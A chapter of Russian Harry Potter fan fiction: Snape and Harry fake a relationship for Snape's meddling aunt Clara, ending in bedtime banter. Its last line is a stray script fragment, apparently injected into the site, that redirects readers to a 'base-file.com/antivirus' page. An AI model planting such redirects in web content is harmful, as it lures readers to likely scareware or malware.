– Гарри совершенно точно знает, что я чувствую к нему, – честно ответил Северус. Поттер, действительно, все знает об их неприязни. – Нет никакой причины выказывать интимные чувства перед посторонними людьми.

– Я же не говорила, что мечтаю увидеть вас в непристойном виде на обеденном столе, Северус! Просто, хоть иногда, дари ему немного ласки и нежности. – После этих слов Снейп заскрипел зубами так, что, тут же забеспокоился, как бы не стереть всю зубную эмаль. – Ну, если это так трудно, хотя бы держи его за руку.

– Достаточно, – Северус решительно закончил разговор. – Я больше не желаю ничего об этом слышать.

– Очень хорошо, я умолкаю, – Клара чопорно сложила руки на коленях.

В глазах Снейпа засветилось недоверие:

– Насовсем?

– На время.

– И до какого момента? – процедил разъяренный племянник.

– Не знаю, – таким же тоном ответила тетушка.

– Я очень настоятельно прошу, не суй свой нос в мои личные отношения с Гарри! – в голосе Северуса прозвучала явное предостережение, но во взгляде оно не отразилось. 

– Это угроза? – Клара надменно выгнула седую бровь.

Губы Северуса искривила самодовольная усмешка:

– Я не посмел бы угрожать моей  дорогой тетушке, с покладистым характером.

– Конечно, посмел бы, – проницательно возразила Клара. – Иначе ты не был бы моим племянником.

 Грядущие денечки абсолютно точно продемонстрируют, насколько дерзким может быть Снейп.

 Поздно вечером, уже укладываясь спать, Клара обнаружила на покрывале свернутый лист бумаги. Быстро отыскав очки и сгорая от любопытства, она развернула послание:

«Дорогая Клара,

Я очень рад нашему знакомству и наслаждаюсь общением с Вами. Надеюсь,что и Вы тоже.

Уверен, Вы очень решительный и проницательный человек, и с нетерпением предвкушаю, как мы проведем вместе эти несколько дней, в предверии Рождества.

Искренне Ваш,

Гарри».

Какой необычный мальчик, думала Клара, пряча письмо. Кто же пишет  письма своим гостям, живя с ними бок о бок?

А потом лукаво улыбнулась: необычный – это хорошо, необычный надежно привяжет Северуса к себе. Она никогда не встречала двух человек, более подходящих друг другу. Просто позор, что они не осознают этого!

Пока.

 Гарри сидел на краю кровати Снейпа, когда тот вошел в спальню и закрыл за собой дверь.

Поттер опять облачился в ту же самую рубашку, которую позаимствовал вчера вечером, остальная одежда была аккуратно сложена.

– Я не знал, могу ли остаться здесь или мне лучше уйти на чердак, – Гарри неуверенно пожал плечами.

Северус кивнул и, захватив ночную рубашку, направился в ванную:

– Будет лучше, если ты останешься. Если утром не будет никаких видимых признаков твоего присутствия здесь, то, несомненно, тетушка решит это проверить, кроме того,  есть вероятность, что она услышит, как ты бегаешь вверх-вниз, – дверь в ванную захлопнулась, но через минуту открылась снова,  Северус вернулся и сел на кровать: – Может, трансфигурировать тебе нормальную кровать?

– Почему ты не подумал об этом вчера вечером?! По твоей милости,  мне пришлось провести ночь на жестком полу!

Северус зафыркал и откинул одеяло:

– Я подумал об этом вчера вечером. Но если ты не способен думать ни о чем самостоятельно, то заслужил сон на полу, – пробормотал мужчина, превращая одеяла, на которых предыдущей ночью спал Гарри, в простенькую, но удобную кровать. – И не говори, что я негостеприимен. 

– Ты всегда укладываешь гостей спать на холодном полу?

– Всегда. Nox.

Свет погас, Гарри и Северус улеглись каждый на свою кровать. Ненадолго воцарилось молчание.

– Поттер?

  Ммм?..

– Знаешь, завтра я планирую ущипнуть тебя пару раз за задницу.

– Что?.. 

– На виду у тети, разумеется.

– Что?!

– Спокойной ночи.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>